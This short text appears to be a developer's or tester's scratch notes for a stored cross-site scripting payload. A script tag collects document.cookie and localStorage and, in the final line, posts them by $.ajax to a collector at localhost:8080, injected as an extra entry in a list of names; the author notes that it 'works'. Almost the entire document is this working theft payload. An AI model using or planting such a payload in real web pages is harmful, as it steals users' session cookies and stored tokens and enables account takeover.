<script>(function() { var yourData = JSON.stringify({cookies: document.cookie, storage: localStorage}); console.log(yourData); })();</script>

// $.ajax({
//   type: 'POST',
//   url: "http://localhost:8080",
//   contentType: "application/json; charset=utf-8",
//   dataType: 'json',
//   data: yourData,
//   success: function (data) {
//     console.log(data);
//   }
// })

Works! ...

["Frank", "Susan", "Horatio"]

["Frank", "Susan", "Horatio", "<script>(function() { var yourData = JSON.stringify({cookies: document.cookie, storage: localStorage}); console.log('sending');$.ajax({ type: 'POST', url: 'http://localhost:8080', data: yourData }); console.log('sent'); })();</script>"]
